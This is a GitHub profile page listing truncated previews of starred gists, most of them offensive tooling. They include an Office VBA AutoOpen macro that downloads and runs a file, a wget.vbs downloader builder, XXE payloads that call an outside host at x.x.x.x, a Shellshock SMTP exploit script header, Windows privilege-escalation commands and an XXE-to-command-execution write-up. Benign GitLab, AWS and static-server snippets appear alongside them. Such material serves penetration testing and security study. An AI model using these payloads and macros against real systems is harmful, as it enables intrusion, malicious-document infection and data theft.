Skip to content

Instantly share code, notes, and snippets.

View Taius's full-sized avatar

Matthew Linney Taius

48 followers · 70 following
  • United Kingdom
View GitHub Profile
@dnozay
dnozay / README.md
Last active April 21, 2025 13:21
Collection of useful stuff for interacting with gitlab.

Reset root/admin password

Lost the root/admin password? You can reset it using the command-line. Recipe adapted from gitlab issue #308.

# start the console
sudo gitlab-rails console
@nopslider
nopslider / Download and Execute Office Macro
Last active August 5, 2024 14:58
A short VBA macro to download and execute a file (patching the first two bytes of the file)
Sub AutoOpen()
Const ADTYPEBINARY = 1
Const ADSAVECREATEOVERWRITE = 2
Dim xHttp
Dim bStrm
Dim filename
Set xHttp = CreateObject("Microsoft.XMLHTTP")
@sckalath
sckalath / wget_vbs
Last active August 24, 2025 06:10
wget vbscript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
@staaldraad
staaldraad / XXE_payloads
Last active October 30, 2025 17:31
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@chanj
chanj / AWS Security Resources
Last active June 21, 2021 09:49
AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
@claudijd
claudijd / exploit.py
Last active August 7, 2021 11:45
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
@sckalath
sckalath / windows_privesc
Last active October 2, 2025 07:43
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@willurd
willurd / web-servers.md
Last active November 5, 2025 20:58
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@joernchen
joernchen / gist:3623896
Created September 4, 2012 17:34
XXE to RCE
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();